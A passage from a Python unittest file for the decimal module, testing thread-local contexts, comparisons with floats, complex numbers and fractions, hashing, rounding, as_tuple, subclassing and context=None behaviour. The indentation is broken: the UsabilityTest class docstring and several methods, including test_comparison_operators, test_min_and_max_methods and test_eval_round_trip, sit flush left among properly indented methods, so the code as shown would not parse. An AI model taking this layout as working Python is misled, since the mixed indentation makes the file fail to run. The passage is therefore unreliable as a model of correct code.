        self.assertRaises(TypeError, Decimal(1).copy_sign, '-2')
class CArithmeticOperatorsTest(ArithmeticOperatorsTest):
    # Run the arithmetic-operator tests against the C implementation.
    decimal = C
class PyArithmeticOperatorsTest(ArithmeticOperatorsTest):
    # Run the arithmetic-operator tests against the pure-Python implementation.
    decimal = P
# The following are two functions used to test threading in the next class
def thfunc1(cls):
    """Worker run in thread 1 by ThreadingTest.test_threading.

    ``cls`` is the ThreadingTest instance; its assert* methods and the
    synchro/finish1/finish2 events are used for cross-thread checks.
    This thread computes 1/3 both before and after thread 2 changes its
    own context precision, proving contexts are thread-local.
    """
    Decimal = cls.decimal.Decimal
    InvalidOperation = cls.decimal.InvalidOperation
    DivisionByZero = cls.decimal.DivisionByZero
    Overflow = cls.decimal.Overflow
    Underflow = cls.decimal.Underflow
    Inexact = cls.decimal.Inexact
    getcontext = cls.decimal.getcontext
    localcontext = cls.decimal.localcontext

    d1 = Decimal(1)
    d3 = Decimal(3)
    test1 = d1/d3

    cls.finish1.set()   # signal the first division is done
    cls.synchro.wait()  # wait until thread 2 has changed *its* context

    # Must still use this thread's context, unaffected by thread 2.
    test2 = d1/d3
    with localcontext() as c2:
        cls.assertTrue(c2.flags[Inexact])   # carried over from 1/3 above
        cls.assertRaises(DivisionByZero, c2.divide, d1, 0)
        cls.assertTrue(c2.flags[DivisionByZero])
        with localcontext() as c3:
            # The nested context starts with c2's flags.
            cls.assertTrue(c3.flags[Inexact])
            cls.assertTrue(c3.flags[DivisionByZero])
            cls.assertRaises(InvalidOperation, c3.compare, d1, Decimal('sNaN'))
            cls.assertTrue(c3.flags[InvalidOperation])
            del c3
        # Flags raised inside the nested context do not leak back into c2.
        cls.assertFalse(c2.flags[InvalidOperation])
        del c2

    cls.assertEqual(test1, Decimal('0.333333333333333333333333'))
    cls.assertEqual(test2, Decimal('0.333333333333333333333333'))

    c1 = getcontext()
    cls.assertTrue(c1.flags[Inexact])
    for sig in Overflow, Underflow, DivisionByZero, InvalidOperation:
        cls.assertFalse(c1.flags[sig])
def thfunc2(cls):
    """Worker run in thread 2 by ThreadingTest.test_threading.

    Changes its own thread-local context to prec=18 and verifies that
    the change, flags and traps stay confined to this thread, then
    releases thread 1 via the synchro event.
    """
    Decimal = cls.decimal.Decimal
    InvalidOperation = cls.decimal.InvalidOperation
    DivisionByZero = cls.decimal.DivisionByZero
    Overflow = cls.decimal.Overflow
    Underflow = cls.decimal.Underflow
    Inexact = cls.decimal.Inexact
    getcontext = cls.decimal.getcontext
    localcontext = cls.decimal.localcontext

    d1 = Decimal(1)
    d3 = Decimal(3)
    test1 = d1/d3             # computed with the inherited prec=24

    thiscontext = getcontext()
    thiscontext.prec = 18     # only this thread sees the new precision
    test2 = d1/d3

    with localcontext() as c2:
        cls.assertTrue(c2.flags[Inexact])
        cls.assertRaises(Overflow, c2.multiply, Decimal('1e425000000'), 999)
        cls.assertTrue(c2.flags[Overflow])
        with localcontext(thiscontext) as c3:
            # c3 is a copy of thiscontext, so c2's Overflow is absent.
            cls.assertTrue(c3.flags[Inexact])
            cls.assertFalse(c3.flags[Overflow])
            c3.traps[Underflow] = True
            cls.assertRaises(Underflow, c3.divide, Decimal('1e-425000000'), 999)
            cls.assertTrue(c3.flags[Underflow])
            del c3
        # Neither the flag nor the trap set on c3 leaks back into c2.
        cls.assertFalse(c2.flags[Underflow])
        cls.assertFalse(c2.traps[Underflow])
        del c2

    cls.synchro.set()   # let thread 1 re-run its division
    cls.finish2.set()   # tell the main thread this worker is done

    cls.assertEqual(test1, Decimal('0.333333333333333333333333'))
    cls.assertEqual(test2, Decimal('0.333333333333333333'))

    cls.assertFalse(thiscontext.traps[Underflow])
    cls.assertTrue(thiscontext.flags[Inexact])
    for sig in Overflow, Underflow, DivisionByZero, InvalidOperation:
        cls.assertFalse(thiscontext.flags[sig])
class ThreadingTest(unittest.TestCase):
    '''Unit tests for thread local contexts in Decimal.'''

    # Take care executing this test from IDLE, there's an issue in threading
    # that hangs IDLE and I couldn't find it
    def test_threading(self):
        """Each thread gets its own context cloned from DefaultContext.

        DefaultContext is temporarily reconfigured (prec=24, huge
        exponent range) so that thfunc1/thfunc2 can observe it; it is
        restored afterwards so other tests are unaffected.
        """
        DefaultContext = self.decimal.DefaultContext

        if self.decimal == C and not self.decimal.HAVE_THREADS:
            self.skipTest("compiled without threading")
        # Test the "threading isolation" of a Context. Also test changing
        # the DefaultContext, which acts as a template for the thread-local
        # contexts.
        save_prec = DefaultContext.prec
        save_emax = DefaultContext.Emax
        save_emin = DefaultContext.Emin
        DefaultContext.prec = 24
        DefaultContext.Emax = 425000000
        DefaultContext.Emin = -425000000

        self.synchro = threading.Event()
        self.finish1 = threading.Event()
        self.finish2 = threading.Event()

        th1 = threading.Thread(target=thfunc1, args=(self,))
        th2 = threading.Thread(target=thfunc2, args=(self,))

        th1.start()
        th2.start()

        self.finish1.wait()
        self.finish2.wait()

        # The worker threads must not have polluted the template context.
        for sig in Signals[self.decimal]:
            self.assertFalse(DefaultContext.flags[sig])

        th1.join()
        th2.join()

        DefaultContext.prec = save_prec
        DefaultContext.Emax = save_emax
        DefaultContext.Emin = save_emin
class CThreadingTest(ThreadingTest):
    # Run the threading tests against the C implementation.
    decimal = C
class PyThreadingTest(ThreadingTest):
    # Run the threading tests against the pure-Python implementation.
    decimal = P
class UsabilityTest(unittest.TestCase):
'''Unit tests for Usability cases of Decimal.'''
def test_comparison_operators(self):
Decimal = self.decimal.Decimal
da = Decimal('23.42')
db = Decimal('23.42')
dc = Decimal('45')
#two Decimals
self.assertGreater(dc, da)
self.assertGreaterEqual(dc, da)
self.assertLess(da, dc)
self.assertLessEqual(da, dc)
self.assertEqual(da, db)
self.assertNotEqual(da, dc)
self.assertLessEqual(da, db)
self.assertGreaterEqual(da, db)
#a Decimal and an int
self.assertGreater(dc, 23)
self.assertLess(23, dc)
self.assertEqual(dc, 45)
#a Decimal and uncomparable
self.assertNotEqual(da, 'ugly')
self.assertNotEqual(da, 32.7)
self.assertNotEqual(da, object())
self.assertNotEqual(da, object)
# sortable
a = list(map(Decimal, range(100)))
b = a[:]
random.shuffle(a)
a.sort()
self.assertEqual(a, b)
def test_decimal_float_comparison(self):
Decimal = self.decimal.Decimal
da = Decimal('0.25')
db = Decimal('3.0')
self.assertLess(da, 3.0)
self.assertLessEqual(da, 3.0)
self.assertGreater(db, 0.25)
self.assertGreaterEqual(db, 0.25)
self.assertNotEqual(da, 1.5)
self.assertEqual(da, 0.25)
self.assertGreater(3.0, da)
self.assertGreaterEqual(3.0, da)
self.assertLess(0.25, db)
self.assertLessEqual(0.25, db)
self.assertNotEqual(0.25, db)
self.assertEqual(3.0, db)
self.assertNotEqual(0.1, Decimal('0.1'))
def test_decimal_complex_comparison(self):
Decimal = self.decimal.Decimal
da = Decimal('0.25')
db = Decimal('3.0')
self.assertNotEqual(da, (1.5+0j))
self.assertNotEqual((1.5+0j), da)
self.assertEqual(da, (0.25+0j))
self.assertEqual((0.25+0j), da)
self.assertEqual((3.0+0j), db)
self.assertEqual(db, (3.0+0j))
self.assertNotEqual(db, (3.0+1j))
self.assertNotEqual((3.0+1j), db)
self.assertIs(db.__lt__(3.0+0j), NotImplemented)
self.assertIs(db.__le__(3.0+0j), NotImplemented)
self.assertIs(db.__gt__(3.0+0j), NotImplemented)
self.assertIs(db.__le__(3.0+0j), NotImplemented)
def test_decimal_fraction_comparison(self):
    """Cross-type comparisons between Decimal and fractions.Fraction.

    Uses extreme Emax/Emin so that huge/tiny fractions are exercised
    against the (sub)normal Decimal boundaries.
    """
    D = self.decimal.Decimal
    # `fractions` maps each decimal implementation to the matching
    # Fraction implementation (see the file-level setup).
    F = fractions[self.decimal].Fraction
    Context = self.decimal.Context
    localcontext = self.decimal.localcontext
    InvalidOperation = self.decimal.InvalidOperation

    # Use the C module's limits when available; fall back to the
    # pure-Python defaults otherwise.
    emax = C.MAX_EMAX if C else 999999999
    emin = C.MIN_EMIN if C else -999999999
    etiny = C.MIN_ETINY if C else -1999999997
    c = Context(Emax=emax, Emin=emin)

    with localcontext(c):
        c.prec = emax
        self.assertLess(D(0), F(1,9999999999999999999999999999999999999))
        self.assertLess(F(-1,9999999999999999999999999999999999999), D(0))
        self.assertLess(F(0,1), D("1e" + str(etiny)))
        self.assertLess(D("-1e" + str(etiny)), F(0,1))
        self.assertLess(F(0,9999999999999999999999999), D("1e" + str(etiny)))
        self.assertLess(D("-1e" + str(etiny)), F(0,9999999999999999999999999))

        self.assertEqual(D("0.1"), F(1,10))
        self.assertEqual(F(1,10), D("0.1"))

        c.prec = 300
        # 1/3 rounded to 300 digits is not exactly one third.
        self.assertNotEqual(D(1)/3, F(1,3))
        self.assertNotEqual(F(1,3), D(1)/3)

        self.assertLessEqual(F(120984237, 9999999999), D("9e" + str(emax)))
        self.assertGreaterEqual(D("9e" + str(emax)), F(120984237, 9999999999))

        self.assertGreater(D('inf'), F(99999999999,123))
        self.assertGreater(D('inf'), F(-99999999999,123))
        self.assertLess(D('-inf'), F(99999999999,123))
        self.assertLess(D('-inf'), F(-99999999999,123))
        # Ordering a NaN raises InvalidOperation; Fraction declines the
        # comparison; equality with NaN is simply False.
        self.assertRaises(InvalidOperation, D('nan').__gt__, F(-9,123))
        self.assertIs(NotImplemented, F(-9,123).__lt__(D('nan')))
        self.assertNotEqual(D('nan'), F(-9,123))
        self.assertNotEqual(F(-9,123), D('nan'))
def test_copy_and_deepcopy_methods(self):
Decimal = self.decimal.Decimal
d = Decimal('43.24')
c = copy.copy(d)
self.assertEqual(id(c), id(d))
dc = copy.deepcopy(d)
self.assertEqual(id(dc), id(d))
def test_hash_method(self):
    """hash(Decimal) equals the hash of the numerically equal int/float
    and is independent of the current context's precision."""
    Decimal = self.decimal.Decimal
    localcontext = self.decimal.localcontext

    def hashit(d):
        # hash() and __hash__() must agree.
        a = hash(d)
        b = d.__hash__()
        self.assertEqual(a, b)
        return a

    #just that it's hashable
    hashit(Decimal(23))
    hashit(Decimal('Infinity'))
    hashit(Decimal('-Infinity'))
    hashit(Decimal('nan123'))
    hashit(Decimal('-NaN'))

    # Integers clustered around powers of two, where old hash schemes
    # historically went wrong.
    test_values = [Decimal(sign*(2**m + n))
                   for m in [0, 14, 15, 16, 17, 30, 31,
                             32, 33, 61, 62, 63, 64, 65, 66]
                   for n in range(-10, 10)
                   for sign in [-1, 1]]
    test_values.extend([
            Decimal("-1"), # ==> -2
            Decimal("-0"), # zeros
            Decimal("0.00"),
            Decimal("-0.000"),
            Decimal("0E10"),
            Decimal("-0E12"),
            Decimal("10.0"), # negative exponent
            Decimal("-23.00000"),
            Decimal("1230E100"), # positive exponent
            Decimal("-4.5678E50"),
            # a value for which hash(n) != hash(n % (2**64-1))
            # in Python pre-2.6
            Decimal(2**64 + 2**32 - 1),
            # selection of values which fail with the old (before
            # version 2.6) long.__hash__
            Decimal("1.634E100"),
            Decimal("90.697E100"),
            Decimal("188.83E100"),
            Decimal("1652.9E100"),
            Decimal("56531E100"),
            ])

    # check that hash(d) == hash(int(d)) for integral values
    for value in test_values:
        self.assertEqual(hashit(value), hashit(int(value)))

    #the same hash that to an int
    self.assertEqual(hashit(Decimal(23)), hashit(23))
    # signaling NaNs are unhashable
    self.assertRaises(TypeError, hash, Decimal('sNaN'))
    self.assertTrue(hashit(Decimal('Inf')))
    self.assertTrue(hashit(Decimal('-Inf')))

    # check that the hashes of a Decimal float match when they
    # represent exactly the same values
    test_strings = ['inf', '-Inf', '0.0', '-.0e1',
                    '34.0', '2.5', '112390.625', '-0.515625']
    for s in test_strings:
        f = float(s)
        d = Decimal(s)
        self.assertEqual(hashit(f), hashit(d))

    with localcontext() as c:
        # check that the value of the hash doesn't depend on the
        # current context (issue #1757)
        x = Decimal("123456789.1")

        c.prec = 6
        h1 = hashit(x)
        c.prec = 10
        h2 = hashit(x)
        c.prec = 16
        h3 = hashit(x)

        self.assertEqual(h1, h2)
        self.assertEqual(h1, h3)

        c.prec = 10000
        x = 1100 ** 1248
        self.assertEqual(hashit(Decimal(x)), hashit(x))
def test_min_and_max_methods(self):
Decimal = self.decimal.Decimal
d1 = Decimal('15.32')
d2 = Decimal('28.5')
l1 = 15
l2 = 28
#between Decimals
self.assertIs(min(d1,d2), d1)
self.assertIs(min(d2,d1), d1)
self.assertIs(max(d1,d2), d2)
self.assertIs(max(d2,d1), d2)
#between Decimal and int
self.assertIs(min(d1,l2), d1)
self.assertIs(min(l2,d1), d1)
self.assertIs(max(l1,d2), d2)
self.assertIs(max(d2,l1), d2)
def test_as_nonzero(self):
Decimal = self.decimal.Decimal
#as false
self.assertFalse(Decimal(0))
#as true
self.assertTrue(Decimal('0.372'))
def test_tostring_methods(self):
#Test str and repr methods.
Decimal = self.decimal.Decimal
d = Decimal('15.32')
self.assertEqual(str(d), '15.32') # str
self.assertEqual(repr(d), "Decimal('15.32')") # repr
def test_tonum_methods(self):
    """Conversions to int/float and the floor/ceil/round protocol."""
    #Test float and int methods.
    Decimal = self.decimal.Decimal

    d1 = Decimal('66')
    d2 = Decimal('15.32')

    #int
    self.assertEqual(int(d1), 66)
    self.assertEqual(int(d2), 15)

    #float
    self.assertEqual(float(d1), 66)
    self.assertEqual(float(d2), 15.32)

    #floor
    test_pairs = [
        ('123.00', 123),
        ('3.2', 3),
        ('3.54', 3),
        ('3.899', 3),
        ('-2.3', -3),
        ('-11.0', -11),
        ('0.0', 0),
        ('-0E3', 0),
        ('89891211712379812736.1', 89891211712379812736),
        ]
    for d, i in test_pairs:
        self.assertEqual(math.floor(Decimal(d)), i)
    # NaNs cannot be floored; infinities overflow.
    self.assertRaises(ValueError, math.floor, Decimal('-NaN'))
    self.assertRaises(ValueError, math.floor, Decimal('sNaN'))
    self.assertRaises(ValueError, math.floor, Decimal('NaN123'))
    self.assertRaises(OverflowError, math.floor, Decimal('Inf'))
    self.assertRaises(OverflowError, math.floor, Decimal('-Inf'))

    #ceiling
    test_pairs = [
        ('123.00', 123),
        ('3.2', 4),
        ('3.54', 4),
        ('3.899', 4),
        ('-2.3', -2),
        ('-11.0', -11),
        ('0.0', 0),
        ('-0E3', 0),
        ('89891211712379812736.1', 89891211712379812737),
        ]
    for d, i in test_pairs:
        self.assertEqual(math.ceil(Decimal(d)), i)
    self.assertRaises(ValueError, math.ceil, Decimal('-NaN'))
    self.assertRaises(ValueError, math.ceil, Decimal('sNaN'))
    self.assertRaises(ValueError, math.ceil, Decimal('NaN123'))
    self.assertRaises(OverflowError, math.ceil, Decimal('Inf'))
    self.assertRaises(OverflowError, math.ceil, Decimal('-Inf'))

    #round, single argument
    test_pairs = [
        ('123.00', 123),
        ('3.2', 3),
        ('3.54', 4),
        ('3.899', 4),
        ('-2.3', -2),
        ('-11.0', -11),
        ('0.0', 0),
        ('-0E3', 0),
        # one-argument round uses round-half-even
        ('-3.5', -4),
        ('-2.5', -2),
        ('-1.5', -2),
        ('-0.5', 0),
        ('0.5', 0),
        ('1.5', 2),
        ('2.5', 2),
        ('3.5', 4),
        ]
    for d, i in test_pairs:
        self.assertEqual(round(Decimal(d)), i)
    self.assertRaises(ValueError, round, Decimal('-NaN'))
    self.assertRaises(ValueError, round, Decimal('sNaN'))
    self.assertRaises(ValueError, round, Decimal('NaN123'))
    self.assertRaises(OverflowError, round, Decimal('Inf'))
    self.assertRaises(OverflowError, round, Decimal('-Inf'))

    #round, two arguments; this is essentially equivalent
    #to quantize, which is already extensively tested
    test_triples = [
        ('123.456', -4, '0E+4'),
        ('123.456', -3, '0E+3'),
        ('123.456', -2, '1E+2'),
        ('123.456', -1, '1.2E+2'),
        ('123.456', 0, '123'),
        ('123.456', 1, '123.5'),
        ('123.456', 2, '123.46'),
        ('123.456', 3, '123.456'),
        ('123.456', 4, '123.4560'),
        ('123.455', 2, '123.46'),
        ('123.445', 2, '123.44'),
        # two-argument round of a special value yields a quiet NaN
        ('Inf', 4, 'NaN'),
        ('-Inf', -23, 'NaN'),
        ('sNaN314', 3, 'NaN314'),
        ]
    for d, n, r in test_triples:
        self.assertEqual(str(round(Decimal(d), n)), r)
def test_nan_to_float(self):
# Test conversions of decimal NANs to float.
# See http://bugs.python.org/issue15544
Decimal = self.decimal.Decimal
for s in ('nan', 'nan1234', '-nan', '-nan2468'):
f = float(Decimal(s))
self.assertTrue(math.isnan(f))
sign = math.copysign(1.0, f)
self.assertEqual(sign, -1.0 if s.startswith('-') else 1.0)
def test_snan_to_float(self):
Decimal = self.decimal.Decimal
for s in ('snan', '-snan', 'snan1357', '-snan1234'):
d = Decimal(s)
self.assertRaises(ValueError, float, d)
def test_eval_round_trip(self):
Decimal = self.decimal.Decimal
#with zero
d = Decimal( (0, (0,), 0) )
self.assertEqual(d, eval(repr(d)))
#int
d = Decimal( (1, (4, 5), 0) )
self.assertEqual(d, eval(repr(d)))
#float
d = Decimal( (0, (4, 5, 3, 4), -2) )
self.assertEqual(d, eval(repr(d)))
#weird
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(d, eval(repr(d)))
def test_as_tuple(self):
    """as_tuple() returns the (sign, digit-tuple, exponent) triple."""
    Decimal = self.decimal.Decimal

    #with zero
    d = Decimal(0)
    self.assertEqual(d.as_tuple(), (0, (0,), 0) )

    #int
    d = Decimal(-45)
    self.assertEqual(d.as_tuple(), (1, (4, 5), 0) )

    #complicated string
    d = Decimal("-4.34913534E-17")
    self.assertEqual(d.as_tuple(), (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )

    # The '0' coefficient is implementation specific to decimal.py.
    # It has no meaning in the C-version and is ignored there.
    d = Decimal("Infinity")
    self.assertEqual(d.as_tuple(), (0, (0,), 'F') )

    #leading zeros in coefficient should be stripped
    d = Decimal( (0, (0, 0, 4, 0, 5, 3, 4), -2) )
    self.assertEqual(d.as_tuple(), (0, (4, 0, 5, 3, 4), -2) )
    d = Decimal( (1, (0, 0, 0), 37) )
    self.assertEqual(d.as_tuple(), (1, (0,), 37))
    d = Decimal( (1, (), 37) )
    self.assertEqual(d.as_tuple(), (1, (0,), 37))

    #leading zeros in NaN diagnostic info should be stripped
    d = Decimal( (0, (0, 0, 4, 0, 5, 3, 4), 'n') )
    self.assertEqual(d.as_tuple(), (0, (4, 0, 5, 3, 4), 'n') )
    d = Decimal( (1, (0, 0, 0), 'N') )
    self.assertEqual(d.as_tuple(), (1, (), 'N') )
    d = Decimal( (1, (), 'n') )
    self.assertEqual(d.as_tuple(), (1, (), 'n') )

    # For infinities, decimal.py has always silently accepted any
    # coefficient tuple.
    d = Decimal( (0, (0,), 'F') )
    self.assertEqual(d.as_tuple(), (0, (0,), 'F'))
    d = Decimal( (0, (4, 5, 3, 4), 'F') )
    self.assertEqual(d.as_tuple(), (0, (0,), 'F'))
    d = Decimal( (1, (0, 2, 7, 1), 'F') )
    self.assertEqual(d.as_tuple(), (1, (0,), 'F'))
def test_as_integer_ratio(self):
    """as_integer_ratio() returns a normalized (numerator, denominator)
    pair of ints; infinities and NaNs are rejected."""
    Decimal = self.decimal.Decimal

    # exceptional cases
    self.assertRaises(OverflowError,
                      Decimal.as_integer_ratio, Decimal('inf'))
    self.assertRaises(OverflowError,
                      Decimal.as_integer_ratio, Decimal('-inf'))
    self.assertRaises(ValueError,
                      Decimal.as_integer_ratio, Decimal('-nan'))
    self.assertRaises(ValueError,
                      Decimal.as_integer_ratio, Decimal('snan123'))

    # Sweep signs, coefficients and exponents around the decimal point.
    for exp in range(-4, 2):
        for coeff in range(1000):
            for sign in '+', '-':
                d = Decimal('%s%dE%d' % (sign, coeff, exp))
                pq = d.as_integer_ratio()
                p, q = pq

                # check return type
                self.assertIsInstance(pq, tuple)
                self.assertIsInstance(p, int)
                self.assertIsInstance(q, int)

                # check normalization: q should be positive;
                # p should be relatively prime to q.
                self.assertGreater(q, 0)
                self.assertEqual(math.gcd(p, q), 1)

                # check that p/q actually gives the correct value
                self.assertEqual(Decimal(p) / Decimal(q), d)
def test_subclassing(self):
    # Different behaviours when subclassing Decimal
    Decimal = self.decimal.Decimal

    class MyDecimal(Decimal):
        y = None

    d1 = MyDecimal(1)
    d2 = MyDecimal(2)
    # Arithmetic and named operations return plain Decimal, not the
    # subclass.
    d = d1 + d2
    self.assertIs(type(d), Decimal)

    d = d1.max(d2)
    self.assertIs(type(d), Decimal)

    # copy/deepcopy preserve the subclass and the value.
    d = copy.copy(d1)
    self.assertIs(type(d), MyDecimal)
    self.assertEqual(d, d1)

    d = copy.deepcopy(d1)
    self.assertIs(type(d), MyDecimal)
    self.assertEqual(d, d1)

    # Decimal(Decimal)
    d = Decimal('1.0')
    x = Decimal(d)
    self.assertIs(type(x), Decimal)
    self.assertEqual(x, d)

    # MyDecimal(Decimal)
    m = MyDecimal(d)
    self.assertIs(type(m), MyDecimal)
    self.assertEqual(m, d)
    self.assertIs(m.y, None)

    # Decimal(MyDecimal)
    x = Decimal(m)
    self.assertIs(type(x), Decimal)
    self.assertEqual(x, d)

    # MyDecimal(MyDecimal): instance attributes are not copied over.
    m.y = 9
    x = MyDecimal(m)
    self.assertIs(type(x), MyDecimal)
    self.assertEqual(x, d)
    self.assertIs(x.y, None)
def test_implicit_context(self):
    """An operation called with no explicit context must use the current
    thread-local context (issue 2478)."""
    Decimal = self.decimal.Decimal
    current = self.decimal.getcontext()

    # Check results when context given implicitly. (Issue 2478)
    self.assertEqual(str(Decimal(0).sqrt()),
                     str(current.sqrt(Decimal(0))))
def test_none_args(self):
    # Passing context=None (and rounding=None) must be exactly equivalent
    # to omitting the argument: the operation falls back to the current
    # thread-local context and its rounding mode.
    Decimal = self.decimal.Decimal
    Context = self.decimal.Context
    localcontext = self.decimal.localcontext
    InvalidOperation = self.decimal.InvalidOperation
    DivisionByZero = self.decimal.DivisionByZero
    Overflow = self.decimal.Overflow
    Underflow = self.decimal.Underflow
    Subnormal = self.decimal.Subnormal
    Inexact = self.decimal.Inexact
    Rounded = self.decimal.Rounded
    Clamped = self.decimal.Clamped

    with localcontext(Context()) as c:
        c.prec = 7
        c.Emax = 999
        c.Emin = -999

        x = Decimal("111")
        y = Decimal("1e9999")   # exponent above Emax: overflows
        z = Decimal("1e-9999")  # exponent below Emin: subnormal

        ##### Unary functions
        c.clear_flags()
        self.assertEqual(str(x.exp(context=None)), '1.609487E+48')
        self.assertTrue(c.flags[Inexact])
        self.assertTrue(c.flags[Rounded])
        c.clear_flags()
        self.assertRaises(Overflow, y.exp, context=None)
        self.assertTrue(c.flags[Overflow])

        self.assertIs(z.is_normal(context=None), False)
        self.assertIs(z.is_subnormal(context=None), True)

        c.clear_flags()
        self.assertEqual(str(x.ln(context=None)), '4.709530')
        self.assertTrue(c.flags[Inexact])
        self.assertTrue(c.flags[Rounded])
        c.clear_flags()
        self.assertRaises(InvalidOperation, Decimal(-1).ln, context=None)
        self.assertTrue(c.flags[InvalidOperation])

        c.clear_flags()
        self.assertEqual(str(x.log10(context=None)), '2.045323')
        self.assertTrue(c.flags[Inexact])
        self.assertTrue(c.flags[Rounded])
        c.clear_flags()
        self.assertRaises(InvalidOperation, Decimal(-1).log10, context=None)
        self.assertTrue(c.flags[InvalidOperation])

        c.clear_flags()
        self.assertEqual(str(x.logb(context=None)), '2')
        self.assertRaises(DivisionByZero, Decimal(0).logb, context=None)
        self.assertTrue(c.flags[DivisionByZero])

        c.clear_flags()
        self.assertEqual(str(x.logical_invert(context=None)), '1111000')
        self.assertRaises(InvalidOperation, y.logical_invert, context=None)
        self.assertTrue(c.flags[InvalidOperation])

        c.clear_flags()
        self.assertEqual(str(y.next_minus(context=None)), '9.999999E+999')
        self.assertRaises(InvalidOperation, Decimal('sNaN').next_minus, context=None)
        self.assertTrue(c.flags[InvalidOperation])

        c.clear_flags()
        self.assertEqual(str(y.next_plus(context=None)), 'Infinity')
        self.assertRaises(InvalidOperation, Decimal('sNaN').next_plus, context=None)
        self.assertTrue(c.flags[InvalidOperation])

        c.clear_flags()
        self.assertEqual(str(z.normalize(context=None)), '0')
        self.assertRaises(Overflow, y.normalize, context=None)
        self.assertTrue(c.flags[Overflow])

        self.assertEqual(str(z.number_class(context=None)), '+Subnormal')

        # sqrt of a subnormal raises the full underflow flag cascade.
        c.clear_flags()
        self.assertEqual(str(z.sqrt(context=None)), '0E-1005')
        self.assertTrue(c.flags[Clamped])
        self.assertTrue(c.flags[Inexact])
        self.assertTrue(c.flags[Rounded])
        self.assertTrue(c.flags[Subnormal])
        self.assertTrue(c.flags[Underflow])
        c.clear_flags()
        self.assertRaises(Overflow, y.sqrt, context=None)
        self.assertTrue(c.flags[Overflow])

        # to_eng_string honours the context's capitals setting.
        c.capitals = 0
        self.assertEqual(str(z.to_eng_string(context=None)), '1e-9999')
        c.capitals = 1

        ##### Binary functions
        c.clear_flags()
        ans = str(x.compare(Decimal('Nan891287828'), context=None))
        self.assertEqual(ans, 'NaN1287828')
        self.assertRaises(InvalidOperation, x.compare, Decimal('sNaN'), context=None)
        self.assertTrue(c.flags[InvalidOperation])

        c.clear_flags()
        ans = str(x.compare_signal(8224, context=None))
        self.assertEqual(ans, '-1')
        self.assertRaises(InvalidOperation, x.compare_signal, Decimal('NaN'), context=None)
        self.assertTrue(c.flags[InvalidOperation])

        c.clear_flags()
        ans = str(x.logical_and(101, context=None))
        self.assertEqual(ans, '101')
        self.assertRaises(InvalidOperation, x.logical_and, 123, context=None)
        self.assertTrue(c.flags[InvalidOperation])

        c.clear_flags()
        ans = str(x.logical_or(101, context=None))
        self.assertEqual(ans, '111')
        self.assertRaises(InvalidOperation, x.logical_or, 123, context=None)
        self.assertTrue(c.flags[InvalidOperation])

        c.clear_flags()
        ans = str(x.logical_xor(101, context=None))
        self.assertEqual(ans, '10')
        self.assertRaises(InvalidOperation, x.logical_xor, 123, context=None)
        self.assertTrue(c.flags[InvalidOperation])

        c.clear_flags()
        ans = str(x.max(101, context=None))
        self.assertEqual(ans, '111')
        self.assertRaises(InvalidOperation, x.max, Decimal('sNaN'), context=None)
        self.assertTrue(c.flags[InvalidOperation])

        c.clear_flags()
        ans = str(x.max_mag(101, context=None))
        self.assertEqual(ans, '111')
        self.assertRaises(InvalidOperation, x.max_mag, Decimal('sNaN'), context=None)
        self.assertTrue(c.flags[InvalidOperation])

        c.clear_flags()
        ans = str(x.min(101, context=None))
        self.assertEqual(ans, '101')
        self.assertRaises(InvalidOperation, x.min, Decimal('sNaN'), context=None)
        self.assertTrue(c.flags[InvalidOperation])

        c.clear_flags()
        ans = str(x.min_mag(101, context=None))
        self.assertEqual(ans, '101')
        self.assertRaises(InvalidOperation, x.min_mag, Decimal('sNaN'), context=None)
        self.assertTrue(c.flags[InvalidOperation])

        c.clear_flags()
        ans = str(x.remainder_near(101, context=None))
        self.assertEqual(ans, '10')
        self.assertRaises(InvalidOperation, y.remainder_near, 101, context=None)
        self.assertTrue(c.flags[InvalidOperation])

        c.clear_flags()
        ans = str(x.rotate(2, context=None))
        self.assertEqual(ans, '11100')
        self.assertRaises(InvalidOperation, x.rotate, 101, context=None)
        self.assertTrue(c.flags[InvalidOperation])

        c.clear_flags()
        ans = str(x.scaleb(7, context=None))
        self.assertEqual(ans, '1.11E+9')
        self.assertRaises(InvalidOperation, x.scaleb, 10000, context=None)
        self.assertTrue(c.flags[InvalidOperation])

        c.clear_flags()
        ans = str(x.shift(2, context=None))
        self.assertEqual(ans, '11100')
        self.assertRaises(InvalidOperation, x.shift, 10000, context=None)
        self.assertTrue(c.flags[InvalidOperation])

        ##### Ternary functions
        c.clear_flags()
        ans = str(x.fma(2, 3, context=None))
        self.assertEqual(ans, '225')
        self.assertRaises(Overflow, x.fma, Decimal('1e9999'), 3, context=None)
        self.assertTrue(c.flags[Overflow])

        ##### Special cases
        # rounding=None must defer to the context's current rounding mode.
        c.rounding = ROUND_HALF_EVEN
        ans = str(Decimal('1.5').to_integral(rounding=None, context=None))
        self.assertEqual(ans, '2')
        c.rounding = ROUND_DOWN
        ans = str(Decimal('1.5').to_integral(rounding=None, context=None))
        self.assertEqual(ans, '1')
        ans = str(Decimal('1.5').to_integral(rounding=ROUND_UP, context=None))
        self.assertEqual(ans, '2')
        c.clear_flags()
        self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral, context=None)
        self.assertTrue(c.flags[InvalidOperation])

        c.rounding = ROUND_HALF_EVEN
        ans = str(Decimal('1.5').to_integral_value(rounding=None, context=None))
        self.assertEqual(ans, '2')
        c.rounding = ROUND_DOWN
        ans = str(Decimal('1.5').to_integral_value(rounding=None, context=None))
        self.assertEqual(ans, '1')
        ans = str(Decimal('1.5').to_integral_value(rounding=ROUND_UP, context=None))
        self.assertEqual(ans, '2')
        c.clear_flags()
        self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral_value, context=None)
        self.assertTrue(c.flags[InvalidOperation])

        c.rounding = ROUND_HALF_EVEN
        ans = str(Decimal('1.5').to_integral_exact(rounding=None, context=None))
        self.assertEqual(ans, '2')
        c.rounding = ROUND_DOWN
        ans = str(Decimal('1.5').to_integral_exact(rounding=None, context=None))
        self.assertEqual(ans, '1')
        ans = str(Decimal('1.5').to_integral_exact(rounding=ROUND_UP, context=None))
        self.assertEqual(ans, '2')
        c.clear_flags()
        self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral_exact, context=None)
        self.assertTrue(c.flags[InvalidOperation])

        c.rounding = ROUND_UP
        ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=None, context=None))
        self.assertEqual(ans, '1.501')
        c.rounding = ROUND_DOWN
        ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=None, context=None))
        self.assertEqual(ans, '1.500')
